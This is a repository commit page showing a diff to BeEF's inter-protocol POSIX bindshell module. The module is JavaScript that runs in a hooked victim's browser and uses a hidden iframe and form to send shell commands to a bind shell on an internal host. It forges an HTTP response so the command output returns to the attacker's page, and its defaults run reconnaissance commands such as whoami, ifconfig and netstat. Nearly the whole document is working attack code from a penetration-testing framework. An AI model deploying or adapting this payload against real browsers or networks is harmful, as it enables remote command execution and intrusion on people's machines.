Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fixed IPEC POSIX module

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@1340 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
buherator@gmail.com
2011-10-02 12:39:16 +00:00
parent c015529f19
commit d0f0051878
2 changed files with 17 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files

23
modules/ipec/inter_protocol_posix_bindshell/command.js
View File

@@ -20,6 +20,7 @@ beef.execute(function() {
var cmd = '<%= @cmd %>';
var command_timeout = "<%= @command_timeout %>";
var internal_counter = 0;
var result_size = "<%= @result_size %>";
// create iframe
var iframe = document.createElement("iframe");
@@ -28,7 +29,7 @@ beef.execute(function() {
document.body.appendChild(iframe);
// send a request
function send_cmds(ip, port, cmd) {
function send_cmds(ip, port, cmd, size) {
var action = "http://" + ip + ":" + port + "/index.html?&/bin/sh&&";
var parent = window.location.href;
@@ -45,16 +46,22 @@ beef.execute(function() {
myExt = document.createElement("INPUT");
myExt.setAttribute("id",<%= @command_id %>);
myExt.setAttribute("name",<%= @command_id %>);
myExt.setAttribute("value","echo \"</pre><div id='ipc_content'>\" & " + cmd + " & echo Directory Contents: & ls -la & ");
myExt.setAttribute("value","echo -e HTTP/1.1 200 OK\\\\r;echo -e Content-Type: text/html\\\\r;echo -e Content-Length: "+(34+cmd.length+52+parent.length+115+size*1)+"\\\\r;echo -e Keep-Alive: timeout=5,max=100\\\\r;echo -e Connection: keep-alive\\\\r;echo -e \\\\r;echo \"<html><body><div id='ipc_content'>\";(" + cmd + ")|head -c "+size+" ; ");
myform.appendChild(myExt);
// Adding puffer space for the command result
end_talkback=" echo -e \"__END_OF_POSIX_IPC<%= @command_id %>__</div><s"+"cript>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);</"+"script></body></html>";
while(--size) end_talkback+=" ";
end_talkback+="\" \\\\r ; exit";
// post js to call home and close connection
myExt = document.createElement("INPUT");
myExt.setAttribute("id","endTag");
myExt.setAttribute("name","</div>");
myExt.setAttribute("value","exit & echo \"__END_OF_POSIX_IPC<%= @command_id %>__</div><scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);</"+"script>\" & exit & exit & exit");
myExt2 = document.createElement("INPUT");
myExt2.setAttribute("id","endTag");
myExt2.setAttribute("name","</div>");
myExt2.setAttribute("value",end_talkback);
myform.appendChild(myExt);
myform.appendChild(myExt2);
myform.submit();
}
@@ -88,7 +95,7 @@ beef.execute(function() {
// send request and wait for reply
} else {
send_cmds(target_ip, target_port, cmd);
send_cmds(target_ip, target_port, cmd,result_size);
waituntilok();
}

3
modules/ipec/inter_protocol_posix_bindshell/module.rb
View File

@@ -61,7 +61,8 @@ class Inter_protocol_posix_bindshell < BeEF::Core::Command
{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'},
{'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo HostName: & hostname & ifconfig & netstat -an', 'width'=>'200px' }
{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to seperate commands', 'type'=>'textarea', 'value'=>'echo ID: ; id', 'width'=>'200px' },
{'name'=>'result_size', 'ui_label'=>'Result Size', 'description'=>'Expected maximum size of the result in bytes','value'=>'1024'}
]
end